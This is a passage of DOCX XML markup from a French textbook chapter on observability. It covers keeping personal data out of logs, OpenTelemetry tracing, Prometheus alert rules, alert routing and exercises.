          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Motif exploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ce qui ne doit pas apparaître · python</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Ne journalisez jamais ces valeurs</w:t>
        <w:br/>
        <w:t># - mots de passe, jetons, cookies</w:t>
        <w:br/>
        <w:t># - numéros de carte complets</w:t>
        <w:br/>
        <w:t># - données de santé identifiantes</w:t>
        <w:br/>
        <w:br/>
        <w:t># Si une valeur doit être rapprochée, utilisez une empreinte</w:t>
        <w:br/>
        <w:t>import hashlib</w:t>
        <w:br/>
        <w:t>empreinte = hashlib.sha256(email.encode()).hexdigest()[:12]</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LE JOURNAL EST UNE COPIE DE LA BASE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un journal trop verbeux reconstitue les données personnelles des utilisateurs. Il devient alors un traitement de données à part entière, avec les obligations de conservation et de suppression correspondantes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>83.4 Traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une trace suit une requête à travers plusieurs services. Chaque étape est un segment (span) avec un début, une fin et des attributs. Le contexte se propage d'un service à l'autre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="97" name="Picture 97"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f95.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.95 — Une trace distribuée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une instrumentation standard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Instrumentation OpenTelemetry (Node.js)</w:t>
        <w:br/>
        <w:t>import { NodeSDK } from "@opentelemetry/sdk-node";</w:t>
        <w:br/>
        <w:t>import { OTLPTraceExporter } from "@opentelemetry/exporter-trace-otlp-http";</w:t>
        <w:br/>
        <w:t>import { HttpInstrumentation } from "@opentelemetry/instrumentation-http";</w:t>
        <w:br/>
        <w:br/>
        <w:t>const sdk = new NodeSDK({</w:t>
        <w:br/>
        <w:t xml:space="preserve">  serviceName: "boutique",</w:t>
        <w:br/>
        <w:t>traceExporter: new OTLPTraceExporter({ url: "http://collector:4318/v1/traces"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  instrumentations: [new HttpInstrumentation()],</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>sdk.start();</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Dans le code métier, un segment manuel</w:t>
        <w:br/>
        <w:t>import { trace } from "@opentelemetry/api";</w:t>
        <w:br/>
        <w:t>const span = trace.getTracer("boutique").startSpan("calculer-total");</w:t>
        <w:br/>
        <w:t>try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await calculerTotal(panier);</w:t>
        <w:br/>
        <w:t>} finally {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  span.end();</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.320 — Cinq concepts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45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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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341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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ensemble des segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échantillonnage nécessaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Span</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Une étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Attributs trop nombreux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En-têtes perdus par un proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Échantillonnage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Réduction du volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Biais si mal réglé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Collecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Centralisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Point de défaillance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Corrélation et vérification · python</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Propager l'identifiant de trace dans les journaux</w:t>
        <w:br/>
        <w:t>logging.basicConfig(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    format="%(asctime)s %(levelname)s trace_id=%(trace_id)s %(message)s"</w:t>
        <w:br/>
        <w:t>)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la propagation sur deux services</w:t>
        <w:br/>
        <w:t>curl -s -H "traceparent:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:8080/panier -o /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>83.5 Alertes utiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une alerte doit signaler un problème qui demande une action. Une alerte qui se déclenche sans conséquence apprend aux équipes à l'ignorer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.321 — Cinq anti-patrons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86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Anti-patron</w:t>
            </w:r>
          </w:p>
        </w:tc>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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alerte sur cause</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 CPU élevé »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alerter sur l'effet utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Seuil fixe</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Faux positifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Seuil relatif ou budget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alerte sans propriétaire</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Personne n'agit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Assigner une équipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Trop d'alertes</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Fatigue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Regrouper et hiérarchiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune action</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Bruit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Supprimer ou convertir en tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une alerte exploitable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Alerte sur un symptôme visible par l'utilisateur</w:t>
        <w:br/>
        <w:t>- alert: TauxErreurEleve</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expr: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sum(rate(http_requests_total{status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">      / sum(rate(http_requests_total[5m])) &gt; 0.05</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for: 10m</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    severite: critique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    equipe: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  annotations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resume: "Plus de 5 % d'erreurs sur 10 minutes"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runbook: "https://wiki/runbooks/boutique-erreurs"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un routage hiérarchisé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Le routeur d'alertes évite le bruit</w:t>
        <w:br/>
        <w:t>route:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  receiver: equipe-boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group_by: [alertname, service]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group_wait: 30s</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group_interval: 5m</w:t>
        <w:br/>
        <w:t xml:space="preserve">  repeat_interval: 4h</w:t>
        <w:br/>
        <w:t xml:space="preserve">  routes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - matchers: [severite="critique"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      receiver: astreinte</w:t>
        <w:br/>
        <w:t xml:space="preserve">      repeat_interval: 1h</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - matchers: [severite="avertissement"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      receiver: courriel</w:t>
        <w:br/>
        <w:t xml:space="preserve">      repeat_interval: 24h</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INSTRUMENTER DANS LE BON ORDRE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Mesurer la latence et le taux d'erreur côté utilisateur.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Journaliser en JSON avec identifiant de trace.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Tracer les traversées de service.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Réduire la cardinalité des métriques.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Alerter sur les symptômes, pas sur les causes.</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Métriques, journaux et traces répondent à des questions différentes.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L'observabilité permet de répondre à des questions imprévues.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étiquette à cardinalité variable fait exploser les séries.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p95 décrit mieux l'expérience que la moyenne.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journal structuré se filtre sans expression régulière.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journaux ne doivent pas contenir de données personnelles.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trace se propage par en-têtes entre services.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alerte doit être actionnable et avoir un propriétaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système est observable. Le chapitre suivant transforme ces signaux en objectifs de fiabilité.</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83.1 — Écrire trois requêtes</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Une équipe veut le débit, le taux d'erreur et le p95.</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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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Agrégez par route.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Calculez un rapport.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
